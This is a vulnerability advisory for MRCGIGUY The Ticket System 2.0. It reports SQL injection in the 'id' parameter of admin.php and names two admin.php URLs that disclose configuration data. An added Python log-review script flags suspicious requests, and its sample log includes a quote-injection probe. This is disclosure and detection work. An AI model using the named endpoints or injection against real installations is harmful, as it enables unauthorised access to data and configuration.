Vendor: The Ticket System
By: ThE g0bL!N
CVSS: 7.5 (HIGH)
SQL Injection and Config Information Disclosure
CWE: 89, 200
Product Name: The Ticket System
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mrcgiguy:the_ticket_system:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
MRCGIGUY The Ticket System 2.0 PHP(id) Multiple Remote Vulnerabilities
An attacker can exploit the SQL injection by sending specially crafted SQL in the vulnerable 'id' parameter of the 'admin.php' script, and the configuration information disclosure by accessing 'admin.php?action=editconfig' and 'admin.php?action=editop&id=1'.
Mitigation:
Input validation should be used to prevent SQL injection attacks. Access to the vulnerable scripts should be restricted.
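
Until a patch exists, web server access logs can show whether the two mitigations above are holding. The following is an added example, not code from the advisory or the product: it flags requests to 'admin.php' whose 'id' is not an integer or whose management action comes from outside an admin network. The admin network range, the log format and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Management actions named in the advisory; extend for a real deployment.
SENSITIVE_ACTIONS = {"editconfig", "editop"}
# Assumption: administrators connect only from this network.
ADMIN_NETS = [ipaddress.ip_network("10.0.0.0/24")]
NON_INT_ID = "non-integer id"
OUTSIDE_ADMIN = "management action from outside admin networks"
# Common/combined log format: client address first, request line in quotes.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

def from_admin_net(client):
    try:
        addr = ipaddress.ip_address(client)
    except ValueError:  # hostname or malformed client field
        return False
    return any(addr in net for net in ADMIN_NETS)

def review_line(line):
    """Return (client, findings) for a request to admin.php, else None."""
    m = LINE_RE.match(line)
    url = urlsplit(m.group(2)) if m else None
    if url is None or not url.path.endswith("/admin.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    # Input validation: 'id' is assumed to be a numeric record id.
    if any(not re.fullmatch(r"[0-9]{1,10}", v) for v in params.get("id", [])):
        findings.append(NON_INT_ID)
    # Access restriction: management actions only from admin networks.
    if SENSITIVE_ACTIONS & set(params.get("action", [])) and not from_admin_net(m.group(1)):
        findings.append(OUTSIDE_ADMIN)
    return m.group(1), findings

def review_log(text):
    """Return [(line_number, client, findings)] for lines with findings."""
    reviewed = ((n, review_line(l)) for n, l in enumerate(text.splitlines(), 1))
    return [(n, r[0], r[1]) for n, r in reviewed if r and r[1]]

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2009:10:01:02 +0000] "GET /admin.php?action=editop&id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [12/Mar/2009:10:02:10 +0000] "GET /admin.php?action=editconfig HTTP/1.1" 200 2290
203.0.113.7 - - [12/Mar/2009:10:02:31 +0000] "GET /admin.php?action=editop&id=1%27 HTTP/1.1" 200 310
198.51.100.9 - - [12/Mar/2009:10:03:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 100
"""
```

The 'id' check only sees query-string values, since POST bodies are not recorded in access logs.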